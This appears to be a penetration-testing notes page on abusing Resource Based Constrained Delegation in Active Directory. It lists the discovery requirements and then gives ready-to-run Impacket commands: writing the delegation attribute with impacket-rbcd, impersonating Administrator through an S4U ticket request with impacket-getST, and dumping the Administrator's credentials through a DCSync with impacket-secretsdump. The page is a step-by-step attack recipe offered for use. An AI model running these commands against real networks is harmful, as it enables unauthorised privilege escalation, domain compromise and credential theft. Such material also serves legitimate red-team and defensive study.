👾 Overview

TLDR: GenericWrite over a machine account allows you to impersonate other users against services on that machine.

Resource Based Constrained Delegation (RBCD) is very similar to unconstrained delegation, but it has some key differences.

Users with GenericWrite over a machine account are able to set the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of a machine. This attribute controls which accounts are able to delegate, or impersonate other users, to a given machine. This does require an account with an SPN to succeed, so you’ll need to either compromise an account with an SPN or create a machine account.

🔍 Discovery

Requirements:

  • An account with an SPN - or the ability to create a machine account, more on checking the MAQ here
  • GenericWrite over a machine account - find this with BloodHound

📌 Exploitation

Here’s a general run through of the steps we’ll need to take:

  1. Create a machine account (or compromise an account with an SPN)
  2. Configure the target machine for constrained delegation
  3. Perform an S4U attack - requesting a TGS for the account you want to impersonate against the target system/service
  4. Pass the ticket to authenticate as the impersonated user against the target system

After creating a machine account, you’ll need to actually perform the RBCD.

# Using Impacket
impacket-rbcd -delegate-from '[Your machine account or account with an SPN]' -delegate-to '[Target machine account]' -action 'write' '[domain]/[user]:[password]'

Next, you’ll need to request a TGS for the account you want to impersonate, usually the Administrator.

# Using Impacket
impacket-getST -spn 'cifs/[Target machine]' -impersonate 'Administrator' '[Domain]/[Your machine account or account with an SPN]:[Password]' -dc-ip [IP]

At this point you can pass the ticket to authenticate as the impersonated user against whatever service you’d like on the target system.

✨ Post-Exploitation

You’ll likely want to pass the ticket to perform a DCSync Attack

export KRB5CCNAME=[path to TGS]
impacket-secretsdump -k [target DC] -just-dc-user Administrator

📝 Resources

🔗 Hyperlinkℹ️ Info
RedXORBlueConstrained, unconstrained, and resource based delegation writeup